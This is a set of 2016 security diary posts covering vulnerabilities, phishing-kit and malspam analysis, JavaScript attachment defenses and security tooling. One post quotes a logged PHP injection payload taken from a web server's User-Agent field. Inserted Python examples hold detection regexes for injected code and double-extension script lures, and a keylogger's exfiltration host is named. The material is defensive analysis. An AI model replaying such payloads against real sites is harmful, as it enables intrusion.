Published: 2016-06-29

Critical Symantec Endpoint Protection Vulnerability

Google's "Project Zero" released details about a number of critical vulnerabilities in Symantec's Endpoint Protection product [1]. The vulnerabilities allow arbitrary code execution on systems with this product installed. Other Symantec products are affected as well, since the vulnerabilities are in the core scanning engine that Symantec Endpoint Protection shares with them.

Symantec has released updates, and given the details released by Google, you should update as soon as possible. You will need to update the actual Symantec product, which is different from performing a signature update (signature updates happen automatically).

[1] http://googleprojectzero.blogspot.ca/2016/06/how-to-compromise-enterprise-endpoint.html

Johannes B. Ullrich, Ph.D.


Published: 2016-06-29

Phishing Campaign with Blurred Images

For a few days, I've been seeing a lot of phishing emails that try to steal credentials from victims. Nothing brand new, but this time the scenario is quite different: the malicious email contains an HTML body with nice logos and text pretending to be from a renowned company or service provider. There is a link that opens a page with a fake, blurred document and a popup login page on top of it. The victim is enticed to enter his/her credentials to read the document. I found samples for most of the well-known office document types. Here are some screenshots:

The strange thing is that it is not clear which credentials are targeted: Google, Microsoft or corporate accounts? An efficient phishing campaign takes the victim by the hand and "forces" him/her to disclose what the attacker expects. So, nothing fancy behind this kind of phishing, but it is always interesting to perform further investigations and, for one of them, it was a good idea. Everybody makes mistakes, attackers too! The phishing page was hosted on a Brazilian website. Usually, such material is hosted on a compromised CMS like (not mentioning names) WordPress, Joomla or Drupal. The Apache server had 'directory indexing' enabled, making all the files publicly available, and amongst the .php and .js files was a zip archive containing the "package" used by the attackers to build the phishing campaign. It was too tempting not to have a look at it.

The "blurred" effect was implemented in a very easy way: the fake document is a low-resolution screenshot displayed at a higher resolution. Like this:

The most interesting finding is the presence of a JavaScript function that validates the victim's email address but also checks the TLD. Is it a targeted attack? The presence of .mil, .edu or .gov is interesting, while .com covers all major free email providers.

var errmsg = "";  // error text shown by the form (assumed to be a global in the kit)
function emailCheck(emailStr) {
  var checkTLD = 1;
  var knownDomsPat = /^(com|net|org|edu|int|mil|gov|arpa|biz|aero|name|coop|info|pro|museum|ws)$/;
  // split the domain part on dots; the last element is the TLD
  var domArr = (emailStr.split("@")[1] || "").split(".");
  // reject unless the TLD is a two-letter country code or one of the known generic TLDs
  if (checkTLD && domArr[domArr.length - 1].length != 2 &&
      domArr[domArr.length - 1].search(knownDomsPat) == -1) {
    errmsg = "Please enter a valid email address.";
    return false;
  }
  return true;
}

The HTTP POST data and extra information are sent to the bad guys via a 'mailer.php' script. The data sent are:

  • GeoIP details based on $REMOTE_ADDR
  • User-Agent
  • FQDN / IP
  • Email / Password

Then, an HTTP redirect is performed to a second page: "phone.html" which mimics a Google authentication page and asks for the user phone number. Here again, POST data are processed via "phone.php" which sends a second email with the victim's phone number. Emails are sent to two addresses (not disclosed here):

  • One @gmail.com account
  • One @inbox.ru account

To conclude with a funny finding: there is a specific PHP script 'imp.php' which creates a copy of the material in a new directory. The directory name is based on a random number converted to Base64 and hashed. By calling this script in an automated way, it is possible to fill the web server file system with thousands of new directories:

From a technical point of view, it is a low-level attack but I'm pretty sure it still works. Take care!

Xavier Mertens (@xme)
ISC Handler - Freelance Security Consultant


Published: 2016-06-29

What is your most unusual User-Agent?

When looking at my web logs, I am always out hunting for anomalies. Today, after seeing some odd and long user agents, I figured it would be fun to look for the longest ones that I can find in my logs. First of all: how?

First, I extract the User-Agent string from my web server access log:

cut -f 6 -d'"' access_log > /tmp/useragents

(This may look different for you if you use a different log format.)

Next, sorting the result by line length:

cat /tmp/useragents | awk '{ print length, $0 }' | sort -n -s | cut -d" " -f2- | uniq

So finally, some of the "winners":

Mozilla/5.0 (Windows NT 6.1; WOW64; rv:42.0) Gecko/20100101 Firefox/42.0 OWASMIME/4.0500 (...)

OWASMIME/4.0500 is repeated many times. No idea what this is about. A buggy script?

chr(47).\x22main.php\x22,\x22|=|\x5Cx3C\x22.chr(63).\x22php \x5Cx24mujj=\x5Cx24_POST['@123'];if(\x5Cx24mujj!='')

An exploit for an OLD Joomla issue if I remember right? This stuff still works?

Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/7.0; .NET4.0E; 
.NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; Tablet PC 2.0;
Microsoft Outlook 15.0.4833; Microsoft Outlook 15.0.4833; 
Microsoft Outlook 15.0.4833; Microsoft Outlook 15.0.4833; 
Microsoft Outlook 15.0.4833; Microsoft Outlook 15.0.4833; 
Microsoft Outlook 15.0.4833; Microsoft Outlook 15.0.4833; 
Microsoft Outlook 15.0.4833; ms-office; MSOffice 15)

Again. Lots of duplicate content. Do you REALLY have to tell me what version of Outlook you are running? I know you are proud of your tablet...

Oddly enough, no shell shock today. 

What is your longest User-Agent if you search your weblogs?
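As an added example (my own code, not from the diary), here is the same extraction done in Python, which also flags the two kinds of oddities shown above: tokens repeated many times within one string, and code-like fragments such as chr(, \x22 escapes or the shellshock "() {" prefix. The log lines inside are constructed samples in the combined log format, not real traffic.

```python
"""Rank User-Agent strings from a combined-format access log by length and
flag two oddities the diary points out: tokens repeated many times and
code-like payloads. Added example, not code from the diary; SAMPLE_LOG is
constructed test data, not real traffic."""
import re
from collections import Counter

# Constructed sample lines in Apache combined log format.
SAMPLE_LOG = r'''
203.0.113.5 - - [29/Jun/2016:10:00:01 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:42.0) Gecko/20100101 Firefox/42.0 OWASMIME/4.0500 OWASMIME/4.0500 OWASMIME/4.0500 OWASMIME/4.0500 OWASMIME/4.0500"
203.0.113.6 - - [29/Jun/2016:10:00:02 +0000] "GET /index.php HTTP/1.1" 200 512 "-" "chr(47).\x22main.php\x22,\x22|=|\x5Cx3C\x22.chr(63).\x22php \x5Cx24mujj=\x5Cx24_POST['@123'];if(\x5Cx24mujj!='')"
203.0.113.7 - - [29/Jun/2016:10:00:03 +0000] "GET /robots.txt HTTP/1.1" 200 64 "-" "curl/7.47.0"
203.0.113.8 - - [29/Jun/2016:10:00:04 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
'''.strip().splitlines()

UA_FIELD = 5    # sixth '"'-separated field, matching the diary's cut -f 6 -d'"'
REPEAT_MIN = 3  # a token seen this often inside one User-Agent is suspicious
# Fragments that do not belong in a browser identifier: PHP/eval-style code,
# hex escapes, POST variables, and the shellshock "() {" prefix.
CODE_PATTERNS = re.compile(r"chr\(|\\x[0-9a-fA-F]{2}|_POST|<\?php|\beval\(|\(\)\s*\{")


def extract_user_agents(lines):
    """Pull the User-Agent field out of each log line, skipping malformed lines."""
    agents = []
    for line in lines:
        parts = line.split('"')
        if len(parts) > UA_FIELD:
            agents.append(parts[UA_FIELD])
    return agents


def rank_by_length(agents):
    """Unique agents, longest first (the diary's sort | uniq pipeline, reversed)."""
    return sorted(set(agents), key=len, reverse=True)


def anomalies(ua):
    """Return a list of flags for one User-Agent string (empty if it looks normal)."""
    flags = []
    # Split on whitespace and semicolons; ignore very short tokens like "NT".
    tokens = [t for t in re.split(r"[\s;]+", ua) if len(t) >= 4]
    for tok, n in Counter(tokens).most_common():
        if n >= REPEAT_MIN:
            flags.append(f"repeated:{tok}x{n}")
    if CODE_PATTERNS.search(ua):
        flags.append("code-like")
    return flags


def report(lines):
    """(length, user_agent, flags) for each unique agent, longest first."""
    return [(len(ua), ua, anomalies(ua)) for ua in rank_by_length(extract_user_agents(lines))]


if __name__ == "__main__":
    for length, ua, flags in report(SAMPLE_LOG):
        print(f"{length:4d} {flags or ''} {ua[:80]}")
```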

Johannes B. Ullrich, Ph.D.


Published: 2016-06-27

DDoS Extortion - Almost Universally an Empty Threat

Last year saw an emergence of DDoS threats against financial websites (eventually broadened to others) under the DD4BC moniker.  Eventually that morphed into Armada Collective, with both stopping around December 2015 with the arrest of a minor in Central Europe.  Starting in March, threatening emails resumed from "Armada Collective", threatening massive DDoS attacks if a ransom wasn't paid.  Occasionally they would use booter services to deliver smaller attacks while threatening larger ones.  Over at CloudFlare, there is a good write-up on the latest round of threats.  The short answer is that these latest threats rarely even include the predecessor attack; there is just someone spamming people with a bitcoin wallet address and hoping to get paid (and unfortunately, some do pay).  The moral of the story is that the actors sending emails demanding ransom under threat of DDoS are rarely to be taken seriously.  Don't pay.

John Bambenek
bambenek \at\ gmail /dot/ com
Fidelis Cybersecurity


Published: 2016-06-26

Bart - a new Ransomware

Phishme is reporting the discovery of a new ransomware which its creators have named Bart. Bart shares several commonalities with the Locky ransomware.  Bart is delivered by the same downloader, RockLoader.  The payment site bears a striking resemblance to the Locky page.

But Bart also deviates from Locky in other ways.  The ransom is much higher, 3 Bitcoins, approximately $2000.  But probably the most striking difference is that, unlike most ransomware variants, Bart does not require a command and control server to facilitate the encryption and in fact looks like it has no command and control capability.  Bart does not utilize the complex public-private key or symmetric encryption methods that have become common in ransomware.  Instead it stores the encrypted files in password-protected zip files, and utilizes a victim id and a Tor-based payment website to facilitate decryption.

Unfortunately, no decrypter is yet available.

More information on Bart can be found at the Phishme website.

-- Rick Wanner MSISE - rwanner at isc dot sans dot edu - http://namedeplume.blogspot.com/ - Twitter:namedeplume (Protected)


Published: 2016-06-23

An Approach to Vulnerability Management

No need to do anything to make your auditor happy than to purchase the most popular scanning tool
No need to worry, when the scan is over and the report has been produced - you are all done
No need to ever leave your cube and speak directly with your system administrators
No need to ever test the scanner on a non-production network in advance
No need to worry, a clean scan means you are both compliant and secure
No need to ever leave your cube and speak directly with your application developers
No need to ever let anyone know when your scan starts, after all an attacker is not going to do that so why should you
No need to worry, if something becomes unavailable during a scan it is totally not your problem
No need to show good stewardship after the purchase by producing metrics such as the percentage of findings that have been fixed as a percentage of all the findings
No need to seek data that demonstrates your scanner could serve as a platform to improve your security posture
No need to keep your boss informed of your progress, s/he would not understand 
No need to divert any of your time from finding things to fixing things
No need to ever think that your scanning tool is ever anything but spot-on accurate
No need to hold back, it would be great if you shared your Vulnerability Management “best practices" in our comments section below
Russell Eubanks


Published: 2016-06-22

Security through obscurity never works

In the last couple of years, I've been increasingly working on penetration testing mobile applications. I must admit: this is fun. Not only is it a combination of reverse engineering (static analysis) and active packet/request mangling, but mobile applications bring with them a whole arsenal of new attack vectors (I plan to cover these in a series of diaries since I held a presentation about that last week at SANSFIRE – we'll post the handler presentations on the web site soon too; and I also attended the SEC575: Mobile Device Security and Ethical Hacking course with the fantastic Chris Crowley, one of the best SANS instructors for sure).

With Android and iOS being the two main mobile platforms today, it's logical that most mobile penetration tests are concerned with them as well. Here and there I see Windows mobile, but since even Microsoft is giving up hope on this platform, it appears that we can safely decide to cover Android and iOS only.

Android being more open, I prefer to do penetration testing on Android applications. Typically, when an organization creates applications for several mobile platforms, they use the same server infrastructure (i.e. web services). This is logical – it would not make sense to have multiple server infrastructures that basically perform the same activities for all platforms.

My process is to do the test on the Android application and then verify the findings on the iOS app – whether it uses the same server-side infrastructure and whether it handles local information correctly (and the same way as Android).

Does obfuscation help?

On Android, many developers use ProGuard. ProGuard is a Java shrinker, optimizer, obfuscator, and preverifier. It is useful as it makes an APK file as small as possible, however in that process the class, method and variable names get obfuscated so it is much more difficult to analyze such applications. You can see one (a bit extreme) example below:

Obfuscated APK

In most of my engagements, I ask for a build without ProGuard. I guess my success ratio is around 50%; quite often I get a response back which says: "This is how our production application looks, and you, as an attacker, should be able to circumvent those protections, otherwise the application is secure."

After such an answer we go through the long cycle of explaining why obscurity is not security: ProGuard adds nothing but delays activities a bit. And since penetration testers are almost always limited in time (which is not a problem for an attacker once the application gets published), it is not in the company's interest to waste a penetration tester's time on deobfuscation. Sure, this should be noted as maybe an additional control (albeit a weak one).

While the screenshot above looks very difficult to analyze, even jadx, my favorite decompilation tool (available at https://github.com/skylot/jadx), can deobfuscate it a bit so it's easier to work on such an app: just select Tools -> Deobfuscation and we get the following listing, which is much easier to read. Import this into your favorite IDE and off you go:

Easier to read APK with jadx

If you perform penetration testing, how do you deal with obfuscation? Let us know!

Bojan (https://twitter.com/bojanz)


Published: 2016-06-21

LogMeIn Captain! A "Not so Phishy" Phishing Campaign

Today's story is on another (sort of) phishing campaign - the twist on this one is that the targets are .. us, again, sort of.  This one caught my eye because I've never had a logmein account - no reflection on the product, I've just always had licenses on other comparable products.

The email discusses a real situation, where a breach at one site can result in those credentials being used on a different site, because of the wide practice of folks using "the same password for everything".

The note then continues on with two "click here" links, which point to the two different websites, neither of which is "logmein.com".  

The blog entry linked in the email points to blog.logmeininc.com, which is different from the blog on logmein's home page, which is at blog.logmein.com.  And accounts.logme.in is a domain that truly looks like it was set up to steal credentials.

The use of "lookalike sites" like this, where the DNS name is "close but no cigar" and the content is scraped from the real site, is a very widespread and successful approach: if a person is fooled into clicking the first link, they almost always continue on by giving up their password or installing the malware that's hosted on the site.  This password change form looks precisely like that.

The truly ironic links in this note are the one to the Privacy Policy and the one to "here's a logmein blog that explains why you should never click on links in random emails": both of these point to logmein.com links that look "for real".

The final verdict?  This note is absolutely legitimate, they really are asking folks to reset their passwords. Unfortunately, the way the note is constructed it should be setting off alarm bells for anyone in the security business.  

This really is too bad, because the message is a good one - as Worf (STNG reference) is fond of saying, "it's always a good day to change your password"!

Rob VandenBrink


Published: 2016-06-20

Ongoing Spam Campaign Related to Swift

Some of our readers reported spam messages related to the recent SWIFT case. With all the buzz around this story, it is not surprising to see more and more attackers using this scenario to entice victims to open malicious files. The mail subject is "Swift Payment Notice, pls check" and the mail contains an image of a receipt embedded in an HTML page:

The HTML link points to a malicious PE file called "SWIFT COPY.exe" (MD5: 6ccabab506ad6a8f13c6d84b955c3037). The file is downloaded from a compromised WordPress instance and seems to contain a keylogger. Data are sent to onyeoma5050s.ddns.net. The host resolved to but it is not valid anymore (takedown already completed?)

Even if PE files should be blocked by most web proxies, the current VT score remains low (6/55), which still makes it dangerous.

Xavier Mertens (@xme)
ISC Handler - Freelance Security Consultant


Published: 2016-06-20

Using Your Password Manager to Monitor Data Leaks

I wrote this diary while waiting for my flight back home. Last week, SANSFIRE was held in Washington, where I met some ISC handlers. I did not pay too much attention to the security news, but I faced an interesting story. Recently, a data leak affected LinkedIn and a friend of mine had a chance to access the data (among others, decrypted passwords). He contacted me and suggested changing my password as soon as possible (as proof, he sent my password). It was indeed a "valid" one but not my "current" one. More precisely, it was the very first password that I used when I created my LinkedIn account (a long time ago). Interesting... It means that the leak is not recent.

Passwords are a sensitive topic: don't play with fire and follow this golden rule: change them often and don't re-use them. The "leak" which affected TeamViewer is a good example. I put leak between quotes because it appeared that some of their users were compromised due to password re-use, as they stated. To track and analyze such events, password managers and dormant accounts can be very useful.

Usually, when I receive an invitation to create an account on a website, I accept it and create a unique email address that will NEVER be used anywhere else. I'm using something like "website-url (at) unused (dot) rootshell (dot) be" or "login_webshop.com". This helps me to track:
  • Spammers: I can "learn" which site leaked (or sold?) my details to spammers.
  • Data leaks: by crawling paste websites for my dormant email addresses or logins.

Another interesting feature of some password managers (well, the one I'm using includes it) is that they keep a history of previous passwords with time stamps (when they were changed):

Based on this information, I'm able to estimate when the data leak really occurred and whether it really came from the supposed victim or from another source. This is new proof that password managers are mandatory for everybody: they protect you and they contain useful data to analyze security incidents. Stay safe!
Xavier Mertens (@xme)
ISC Handler - Freelance Security Consultant


Published: 2016-06-18

Controlling JavaScript Malware Before it Runs

We've posted a number of stories lately about various exploit kits and the malware they post.  What I'm seeing lately is a bit of an uptick in the use of Javascript by these exploit kits.

Why might this be, you ask?  Isn't Javascript contained, and hopefully secured, within the browser sandbox?  Aren't we protected by the combined security smarts of Microsoft, Mozilla and Google?  We-e-e-e-l, the short answer is NO.  If the Javascript arrives in an inbound email and one of your Windows-based users clicks it, it doesn't execute in the browser; it executes in Windows Script Host (the same host used by cscript.exe or wscript.exe)!  So as Brad Duncan (another of the ISC Handlers) pointed out, this isn't really a Javascript *exploit*, it's Javascript as nature intended it to be (Brad knows way more about malware than I ever will).

We can see this in the registry: the .js extension maps to the "jsfile" key, which is handled by wshext.dll:
     computer\hkey_classes_root\.js = jsfile
     computer\hkey_classes_root\jsfile = wshext.dll

Or, when you check the file extension in explorer, Shazam!, it's Windows Script Host!

Not only that, cscript.exe is meant as an admin tool, so all of the Javascript protections that we take for granted in our browser are ABSOLUTELY NOT in play.  All kinds of new (or rather old) features that aren't allowed in the browser now work again.  For instance, javascript executed in cscript can create a tcp client or a tcp server.    Like perhaps to pull malware, maybe crypto-malware down, then install it.  Or to create a basic tcp backdoor or a reverse-shell backdoor.

Worse yet, when you receive a JS file in an email, you'll see an icon that makes it look like it's a text or document file of some kind.  On top of all of that, what we're seeing as a common SPAM practice that makes this more confusing for the folks reading their mail is a "double extension" approach - so these are arriving as "corporate layoffs.doc.js", "bonus Q2.xls.js" or "ups shipping notice.pdf.js" - when this shows up in your mail client, by default Windows (not so helpfully) won't display the "known file extension"  of js, so your folks will see these as docs, excel sheets or pdf files.

So how can we as system administrators protect our users?  Out of the gate we should strip out attachments of type .JS in emails at the SPAM gateway; there's no good reason to be emailing javascript files in and out of the organization (in almost all cases).

In the spirit of "defense in depth" though, let's assume that one of our trusted business partners (who might be whitelisted in the spam filter) or one of our internal users (internal mail doesn't typically go through the spam filter) is already compromised. How do we protect our users in those scenarios?  Let's re-associate the .JS file type with something that won't actually execute the file. How about notepad?

To do this for a single workstation, right-click on a .js file and open it with notepad; be sure to tick the "always use the selected program to open this kind of file" box when you do that.

For an entire organization, you can force the file association in Group Policy, at Computer Configuration / Preferences / Control Panel Settings / Folder Options, then add "New" / File Type.


You can see here that we can change how the file opens, and even change the icon that's being displayed. 

Now when we receive some malicious javascript in our inbox, it'll look very different.  And when your folks click on the file, that advanced persistent malicious "hello.js" file below will display rather than execute.
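As an added example (my own code, not from the diary), here is a Python check a mail gateway or triage script can apply to attachment names before any icon is shown to the user: it spots the final script extension that Windows Script Host would run, the "something.doc.js" double extension described above, and the same names hidden inside a zip attachment. The attachment names and the zip are constructed samples; the extension sets are assumptions for a default Windows install.

```python
"""Spot mail attachments that Windows would hand to Windows Script Host,
including the "invoice.pdf.js" double-extension lure and zipped .js files.
Added example, not code from the diary; names and the zip are constructed."""
import io
import zipfile
from pathlib import PurePosixPath

# Extensions registered to wscript.exe/cscript.exe on a default Windows install (assumed set).
SCRIPT_EXTS = {".js", ".jse", ".vbs", ".vbe", ".wsf", ".wsh"}
# Document types the lures impersonate (assumed set, taken from the diary's examples).
DOC_EXTS = {".doc", ".docx", ".xls", ".xlsx", ".pdf", ".txt", ".rtf"}


def displayed_name(filename):
    """What Explorer shows with 'Hide extensions for known file types' on:
    the final extension disappears, so 'bonus Q2.xls.js' reads 'bonus Q2.xls'."""
    stem, dot, _ext = filename.rpartition(".")
    return stem if dot else filename


def classify(filename):
    """Reasons to block the attachment (empty list means it is not a WSH script)."""
    suffixes = PurePosixPath(filename.strip().lower()).suffixes
    reasons = []
    if suffixes and suffixes[-1] in SCRIPT_EXTS:
        reasons.append(f"script:{suffixes[-1]}")
        # Double extension: a document-looking name right before the script extension.
        if len(suffixes) >= 2 and suffixes[-2] in DOC_EXTS:
            reasons.append(f"double-extension:looks like {displayed_name(filename.strip())}")
    return reasons


def scan_zip(data):
    """Run classify() over every member of a zip attachment given as bytes."""
    findings = {}
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for member in zf.namelist():
            reasons = classify(PurePosixPath(member).name)
            if reasons:
                findings[member] = reasons
    return findings


def build_sample_zip():
    """Constructed stand-in for a zipped-.js malspam attachment (no real malware inside)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("ups shipping notice.pdf.js", "// placeholder content\n")
        zf.writestr("readme.txt", "benign text\n")
    return buf.getvalue()


if __name__ == "__main__":
    for name in ("corporate layoffs.doc.js", "bonus Q2.xls.js", "quarterly.xlsx"):
        print(name, "->", classify(name) or "ok")
    print(scan_zip(build_sample_zip()))
```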


So if you're walking around the office, you can look for the screen that has 10 or 12 notepad files of code open, and feel good that there's one that didn't get infected!  Or more likely (and sadly), check that machine to see how *else* they found to get infected :-)

Rob VandenBrink


Published: 2016-06-17

Critical Adobe Flash Update. Patch Now

Adobe did not release a patch for Flash on Tuesday, but instead alerted users of an unpatched, and actively exploited, vulnerability (CVE-2016-4171).

Today, Adobe did release a patch that fixes this vulnerability (and others). This is a "PATCH NOW" vulnerability that needs to be addressed as soon as possible.



Johannes B. Ullrich, Ph.D.


Published: 2016-06-15

Warp Speed Ahead, L7 Open Source Packet Generator: Warp17


If you've noticed a slow-down in diaries over the past few days, check out this picture on Twitter https://twitter.com/tbeazer/status/742509914900271104 from our State of the Internet Panel. That is quite a few of us at SANSFIRE 2016 #SANSFIRE. It is the once-a-year pilgrimage that some of us take to gather together and take some training. Before going to Warp17, it felt important to note that even 'handlers' need training.

So, Lorna? Challenge thrown down, challenge accepted. (Look for a review of SANSFIRE from the handlers over the next couple of months.)

Now, onto a tool a colleague and friend sent over. The website can be found @ http://warp17.net/ and the codebase @ https://github.com/Juniper/warp17. The first question I asked was 'why Warp17', what's the cool GEEK reference? Well, this handler was expecting some cool 'Star Trek' reference and was met with "Who's A Rapid Packet generator? [1]" Ahhh... Warp17 because it goes REALLY FAST... *where's the coffee?*

The authors state that, with the hardware they used, Warp17 can push nearly 40 Gigabits out of an x64 platform [3]. Not only that, it can send out HTTP packets. See the docs regarding their layer 7 aspirations; according to the documentation, "WARP17 currently supports RAW TCP and HTTP 1.1 application traffic. Even though we are currently working on adding support for more application implementations, external contributions are welcome." [2]

Fig 1. Basic Logical Setup

First thing I noticed is running this as a virtual machine (VM) on a lab laptop will require some cores. This application is CORE hungry and likely designed to be run on hardware or virtual machines with some serious cores available to it. In my VM, it was given 4GB RAM and 4 Cores. Setting aside the first two cores for CLI and Management and second 2 cores for packet generation. Now, it is highly unlikely *sarcasm* that we will get 40Gb of packets out of two cores from the laptop i7 it is running on, but here we go….

Fig 2. CPU Cores on Laptop i7

The documentation is pretty straightforward, but some math will be involved. The first step in the example was doing some bitwise math to determine core usage. According to the README, figure 3 is the table for the command. After review, it looks like my -c option is 0xF.

Figure 3. Bitmask Table from README

After looking at a blank memory channel output when building my own VM, some discussion with the author ensued and getting memory channels from a VM and from some hardware can have different results. The Warp17 team has built a Star Ship *poor attempt at humor* for us [4] [5]. This began the (not-so)fun adventure of downloading a 1G VM on the #SANSFIRE hotel link.

Further dialog concluded that the -n option 'can' safely be left out on virtual machines, as memory is dynamically allocated. The -m option will inform the hypervisor how much RAM is requested, and my start command seems to be:

-c 0xF -m 2048

Now before you go off on an adventure to build your own VM, please take a look at the Warp17 Virtual Machine README https://github.com/Juniper/warp17/blob/dev/common/ovf/README.md and decide carefully whether you want to download theirs. The authors have already patched DPDK for you and done some tests. At the time of this writing, the author disclosed that 1.1 is in the works and should be released some time after this diary, in the next day or two, and he's not in marketing so it will likely be the next day or two *sarcasm filled humor*.

Following the README, check dpdk to find the status of the vNICs (see figure 4). The VM README [6] covers this; in short, we need to bind interfaces to dpdk. So far it seems that my first vNIC is active, but at first glance there are some issues: vNIC0 is for management and CLI, while vNIC1 and vNIC2 seem to be inactive. When bringing up your interfaces for use with Warp17, don't add an L3 IP like some people did *cough* me *cough* (RTFM, the Warp17 authors cover a lot of this). For a full run-through on getting dpdk to attach to a NIC, refer to this README section (https://github.com/Juniper/warp17/blob/master/README.md#configure-dpdk-ports) [7].

For those that want to jump straight to QEMU: read the VM README fully, there are instructions on how to take flight on QEMU quickly [6]. When dpdk is set correctly and you sprinkle magic pixie dust on your VM (*kidding*, 'it's pretty straightforward if you RTFM'), figure 4 is what you should see.

Figure 4.

Warp Speed Mr. Sulu!


sudo ./warp17/build/warp17 -c f -m 2024 -- \
        --tcb-pool-sz 1 \
        --cmd-file /home/<user>/warp17/examples/


Make sure to pay attention to -m and set your page sizes to the memory you have allocated to Warp17; it seems the warp engines in this ship are VERY hungry. Also, pay attention to --tcb-pool-sz: notice in the manual the default was 10, and the developers had a monster hardware platform to work with. My little Fusion VM on my MacBook Pro would probably cry and tap out very fast with a 10, so we set this argument to 1.

Moving on to examples: for those of us that "just want to fire it up and set phasers to blast out packets", the authors have CFG examples in *musical tone* da da DA 'the examples directory'. Note: found in the Warp17 directory (wherever you put it) under ./examples.

Bottom line, this application is worth a look as a low cost (code is free), open source, BSD licensed "star ship" designed to generate a ton of packets. The authors are active and ready to collaborate. 

Find them on social media @

Twitter: @warp1_7

Facebook: https://www.facebook.com/warp17stg

Google: https://groups.google.com/forum/#!forum/warp17

GitHub: https://github.com/Juniper/warp17


[1] http://warp17.net

[2] https://github.com/Juniper/warp17

[3] https://github.com/Juniper/warp17/blob/master/README.md#performance-benchmarks

[4] https://github.com/Juniper/warp17/tree/dev/common/ovf

[5] http://warp17.net/downloads/

[6] https://github.com/Juniper/warp17/blob/dev/common/ovf/README.md

[7] https://github.com/Juniper/warp17/blob/master/README.md#configure-dpdk-ports



Published: 2016-06-12

DNS Sinkhole ISO Version 2.0

After 4 years (the previous version, 1.3, dates from June 2012), I'm releasing DNS Sinkhole version 2.0, 64-bit only, which can be used with either Bind or PowerDNS. It contains the following changes:

- Updated to Slackware 14.1 with Linux kernel 3.10.17
- Added inetsim in the /opt directory as a limited alternative to collect redirected sinkhole information
- Updated PowerAdmin to version 2.1.7 with DNSSEC support
- Updated pdns to version 3.4.7
- Updated pdns-recursor to version 3.7.3

As per previous versions, you can update the Slackware OS packages with /root/slackupdate.sh shell script. All the custom packages I have created (CD Z directory) will be updated by executing /root/cust64update.sh shell script. I will update and release those as necessary.

I have terminated the maintenance of the 32-bit version but it is still available for download and the patches are still maintained by Slackware.

Version 2.0 is available for direct download here [2], the MD5 here [3] and the documentation here [4]. The documentation is also on the CD in the rel_note directory. My SANS paper on DNS Sinkhole is here [5].

Happy hunting and host/domain sinking!

[1] http://handlers.sans.org/gbruneau/sinkhole.htm
[2] http://handlers.sans.org/gbruneau/iso/sinkhole/sinkhole64-bit.iso
[3] http://handlers.sans.org/gbruneau/iso/sinkhole/sinkhole64-bit.md5
[4] http://handlers.sans.org/gbruneau/docs/DNS_Sinkhole_setup.pdf
[5] http://www.sans.org/reading-room/whitepapers/dns/dns-sinkhole-33523
[6] https://isc.sans.edu/forums/diary/IPv6+and+DNS+Sinkhole/11542

Guy Bruneau IPSS Inc.
Twitter: GuyBruneau
gbruneau at isc dot sans dot edu


Published: 2016-06-09

Offensive or Defensive Security? Both!

Sometimes students ask me the best way to jump into "the security world". I usually compare information security to medicine: you start with a common base (strong knowledge of "IT"), then you must choose a "specialization": auditor, architect, penetration tester, reverse engineer, incident handler, etc. Basically, those specializations can be grouped into two categories: "offensive" and "defensive". Many people like the first one because it looks more fun, and the portrait of the hacker as depicted in Hollywood movies is tough! Being involved in a few calls for papers for security conferences, I see a clear trend in submissions focusing on offensive security.

If breaking stuff is always nice (playing the "red team"), being able to defend it against attackers is also very rewarding (playing the "blue team"). So, back to the student's question: which side of the force to choose? I can't answer this question for you! It's a very personal choice based on your feelings, but one thing is certain: there is a clear overlap between offensive and defensive security. Why? Here are two examples.

First, from a defender's perspective. To be able to properly defend your assets, you must know which techniques and tools the bad guys will use against you. This is the principle of "Know your enemy!". If you're involved in a security incident, your knowledge of the bad side will be very helpful to find out how your server was compromised. If you're implementing a solution or writing some code, try to think like a bad guy and ask yourself "How would I try to break my setup?".

On the other side, from an attacker's perspective, you can improve your work by using defenders' techniques. While performing a pentest, we don't have unlimited time. A good idea is to rely on forensic investigation techniques. Indeed, operating systems like Microsoft Windows are well known to keep traces of all user activities in multiple places. It is possible to trace back all the actions performed by a user (which applications he started, the last files opened, network shares mounted, etc.). This is a gold mine for a pentester too. Imagine that you just compromised a computer. You have your Meterpreter shell ready. And now? To save time, just check the latest files opened by the victim; there are chances that they will be business related and contain juicy information. Which internal sites did he visit? Those are nice targets to pivot to!

So, offensive or defensive security? Choose the one you like, but think about both!

Xavier Mertens (@xme)
ISC Handler - Freelance Security Consultant


Published: 2016-06-09

Searching for malspam


About a week ago, I stopped seeing the daily deluge of malicious spam (malspam) distributing the Dridex banking trojan or Locky ransomware.  Before this month, I generally noticed multiple waves of Dridex/Locky malspam almost every day.  This malspam carries attachments with zipped .js files or Microsoft Office documents designed to download and install the malware.

I haven't found much discussion about the current absence of Dridex/Locky malspam.  Since the actor(s) behind Dridex started distributing Locky back in February 2016 [1], I can't recall any lengthy absence of this malspam.

Shown above:  Have others noticed a lull in Dridex/Locky? [2]

Of course, other campaigns are ongoing, so I figure it's time to review other examples of malspam.  These campaigns are somewhat harder to find than Dridex/Locky malspam, but they're certainly out there.

However, my field of view is limited, and I can only report on what I'm seeing.  With that in mind, this diary reviews two examples of malspam I found on Wednesday 2016-06-08.

First example

Our first example was sent to one of the ISC handlers' email aliases.  This example has a zipped .js file attachment.

Shown above:  Malspam sent to one of the ISC handler distribution lists on 2016-06-08.

Shown above:  Contents of the zip file attachment from the malspam.

Shown above:  The extracted .js file opened in a text editor.

Running the extracted .js file on a Windows host generated plenty of HTTP traffic.

Shown above:  A pcap of the infection traffic filtered in Wireshark.

I saw plenty of artifacts on the infected host, and at least one of the items appears to be Andromeda, based on alerts seen when I played back a pcap of the traffic in Security Onion using Suricata with the ETPRO ruleset.

Shown above:  Alerts generated on the pcap from Sguil in Security Onion.

The Snort subscriber ruleset also generated alerts on the same traffic that triggered Andromeda hits with the ETPRO ruleset.

Shown above:  Some of the alerts after reading the pcap in Snort using the Talos Snort subscriber ruleset.

Second example

Our second example is Brazilian malspam in Portuguese sent to a different email address.  Instead of an attachment, this one has a link to download the malware.

Shown above:  Malspam sent to a recipient using a Brazilian email address.

Shown above:  Translation of the message from Portuguese to English.

The link from the malspam redirected to malware hosted on 4shared.com.

